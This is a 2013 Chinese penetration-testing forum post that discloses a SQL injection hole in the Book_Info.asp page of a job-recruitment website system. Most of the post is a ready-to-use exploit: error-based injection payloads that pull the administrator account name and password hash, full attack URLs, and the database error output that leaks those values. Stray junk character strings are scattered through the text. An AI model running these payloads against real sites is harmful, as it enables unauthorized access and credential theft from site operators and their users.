中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版漏洞 [打印本页]
作者: admin    时间: 2013-2-13 23:56
标题: 网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp, `9 g3 ?9 e" I% X: L5 u4 L. G
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出# M  s7 ]% A/ i* ~6 Z! b
exp:如下2 a1 U2 w( u$ w  v% h. W
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 `( a" F% w3 J2 {8 N
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)" e& c) A5 V1 \+ G+ m
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)) u4 x8 E) S( b4 ?4 E4 h/ e
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'7 _" k" N& ^1 |$ Y6 c% e8 l
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。$ k/ b/ N; f0 b% M
/Educate/Book_Info.asp,行 8
/ a- ^9 a2 C. J9 z7 z5 ~7 m' D& o6 Xhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ @: l; e& p( X* g! n1 \5 tMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
) d/ M; W# _/ q/ f; s! w7 J将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
) B! \" y8 c" l/Educate/Book_Info.asp,行 8



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2